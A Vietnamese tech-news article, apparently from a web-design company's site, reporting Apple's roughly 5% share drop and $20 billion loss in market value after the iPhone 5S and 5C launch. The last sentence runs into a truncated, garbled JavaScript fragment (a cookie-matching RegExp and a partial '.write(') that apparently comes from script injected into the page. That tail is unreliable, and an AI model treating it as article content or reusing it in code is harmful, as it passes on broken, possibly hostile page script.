Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin công nghệ > Cổ phiếu của Apple giảm 5% chỉ sau một đêm vì iPhone thế hệ mới

Cổ phiếu của Apple giảm 5% chỉ sau một đêm vì iPhone thế hệ mới

Màn ra mắt bộ đôi sản phẩm iPhone 5S và iPhone 5C của Apple vào rạng sáng hôm qua 11/9 không chỉ khiến giới công nghệ cảm thấy thất vọng vì có quá ít sự đổi mới, mà ngay cả các nhà đầu tư cũng cảm thấy không hài lòng chút nào, và điều này đã khiến giá cổ phiếu của Apple giảm xuống 5%.

Theo đó, cổ phiếu của hãng đã mất 5% giá trị sau màn ra mắt của bộ đôi sản phẩm mới, mà nguyên nhân chính được cho là vì các nhà đầu tư cảm thấy thất vọng với giá bán quá cao của iPhone 5C và sự thiếu vắng những cải tiến mới nhất của iPhone 5S.

Apple đã khiến các nhà đầu tư thất vọng

Trước thềm sự kiện diễn ra, các nhà phân tích dự đoán Apple sẽ giới thiệu phiên bản iPhone giá rẻ – iPhone 5C với mức giá  từ 400 – 500 USD, giúp Apple có thể xâm nhập vào các thị trường tiềm năng, đặc biệt là Trung Quốc.

Mức giá của iPhone 5C quá cao đã khiến các nhà đầu tư thất vọng

Tuy nhiên trên thực tế, 5C chỉ là phiên bản có nhiều màu sắc hơn chứ không phải là một phiên bản iPhone giá rẻ. 5C có giá bán 99 USD đối với bản 16GB và 199 USD cho bản 32GB kèm theo 2 năm hợp đồng của nhà mạng. Trong khi đó, phiên bản không có hợp đồng nhà mạng có giá lên đến 549 USD và 649 USD lần lượt với bản 16GB và 32GB. Và thậm chí tại thị trường Trung Quốc mức giá này còn lên đến 733 USD.

Mặc dù giá bán của iPhone 5C có thấp hơn iPhone 5S, nhưng với mức giá mà Apple đưa ra, thật khó để có thể xem rằng 5C là phiên bản iPhone giá rẻ. Hiện 5S có giá khởi điểm 199 USD  kèm theo hợp đồng nhà mạng và 649 USD không kèm hợp đồng nhà mạng.

Apple mất 20 tỷ USD chỉ sau một đêm

Van Baker, Phó chủ tịch và giám đốc nghiên cứu của hãng nghiên cứu thị trường Gartner đã nhận xét: “ra mắt nhiều sản phẩm với các mức giá khác nhau sẽ giúp Apple tăng thêm thị phần trên thị trường smartphone. Tuy nhiên, mức giá của iPhone 5C vẫn chưa tạo ra sự khác biệt. trong khi đó, người dùng vẫn muốn một mức giá rẻ hơn.”

Với mức giá của iPhone 5C, người dùng vẫn còn nhiều lựa chọn khác trên thị trường, đặc biệt là các smartphone chạy Android có cấu hình và tính năng vượt trội nhưng chỉ với mức giá mềm hơn rất nhiều.

Nhiều nhà phân tích cho rằng, mục tiêu mà Apple đang hướng đến đó là muốn nâng cao thêm lợi nhuận của hãng, thay vì tăng cường thêm số lượng người dùng.

Một nguyên nhân khác khiến các nhà đầu tư cảm thấy thất vọng nữa đó là Apple chưa đạt được thỏa thuận với nhà mạng China Mobile – là nhà mạng lớn nhất thế giới về số lượng người dùng, để phân phối iPhone giá rẻ đến thị trường Trung Quốc.

Bù vào đó, Apple đã đạt được thỏa thuận với nhà mạng lớn nhất Nhật Bản NTT Domoco để có thể phân phối iPhone thế hệ mới tại thị trường Nhật Bản. Trước đó, NTT Domoco chưa từng phân phối phiên bản iPhone nào của Nhà Táo.

Dự kiến iPhone 5S và iPhone 5C sẽ chính thức lên kệ vào ngày 20/9 tới đây.

Giá cổ phiếu của Apple đã sụt giảm từ mức 494 USD xuống còn 467 USD trong một ngày sau khi sự kiện giới thiệu iPhone mới diễn ra. Điều này đã khiến Apple mất đi 20 tỷ USD giá trị vốn hóa chỉ sau một đêm. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘